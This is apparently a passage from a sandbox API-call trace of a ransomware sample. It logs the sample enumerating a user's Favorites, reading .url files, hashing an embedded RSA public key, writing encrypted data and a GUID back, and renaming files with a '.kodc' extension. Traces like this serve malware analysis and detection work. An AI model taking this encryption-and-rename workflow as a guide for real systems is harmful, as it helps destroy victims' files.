(HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0101.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0101.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80b8 | out: hHeap=0x630000) returned 1 [0101.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80a0 | out: hHeap=0x630000) returned 1 [0101.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0101.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.638] GetCurrentThreadId () returned 0x42c [0101.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba8398 [0101.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0101.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0101.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.639] GetCurrentThreadId () returned 0x42c [0101.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0101.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0101.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0101.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0101.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0101.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0101.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0101.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80a0 [0101.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0101.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0101.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0101.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0101.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80b8 [0101.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0101.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0101.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0101.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8088 [0101.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0101.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.641] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.641] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.641] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb80d0 [0101.641] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.641] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a28 [0101.641] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.641] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0101.641] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.641] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0101.641] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.641] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0101.641] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80a0 | out: hHeap=0x630000) returned 1 [0101.641] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80a0 [0101.641] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.641] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0101.641] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.642] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.642] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.642] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0101.642] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.642] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.642] CloseHandle (hObject=0x5cc) returned 1 [0101.648] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.kodc")) returned 1 [0101.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0101.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.649] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0101.651] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0101.651] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0101.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0101.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332dc90 | out: hHeap=0x630000) returned 1 [0101.651] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0101.651] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0101.651] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="Windows Live\\" [0101.652] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0101.652] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0101.652] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0101.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.652] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0101.652] PathFindFileNameW (pszPath="") returned="" [0101.652] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0101.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.653] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.653] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0101.653] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned=".url" [0101.653] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.655] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=133) returned 1 [0101.655] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.658] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.658] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.659] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.659] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.659] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.660] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x85, lpOverlapped=0x0) returned 1 [0101.660] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.660] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.660] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.660] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.660] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.661] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.661] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.661] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.661] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.661] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.661] GetLastError () returned 0x0 [0101.661] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.661] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.661] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.661] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.661] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.662] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0101.662] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.662] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6160 [0101.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8070 [0101.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb61a8 [0101.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8088 [0101.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80b8 [0101.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80d0 [0101.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.662] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80b8 | out: hHeap=0x630000) returned 1 [0101.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80d0 | out: hHeap=0x630000) returned 1 [0101.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0101.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb80d0 [0101.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0101.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb80b8 [0101.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0101.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0101.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0101.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0101.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0101.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80d0 | out: hHeap=0x630000) returned 1 [0101.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80b8 | out: hHeap=0x630000) returned 1 [0101.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0101.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.664] GetCurrentThreadId () returned 0x42c [0101.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba8428 [0101.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0101.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0101.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.665] GetCurrentThreadId () returned 0x42c [0101.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, 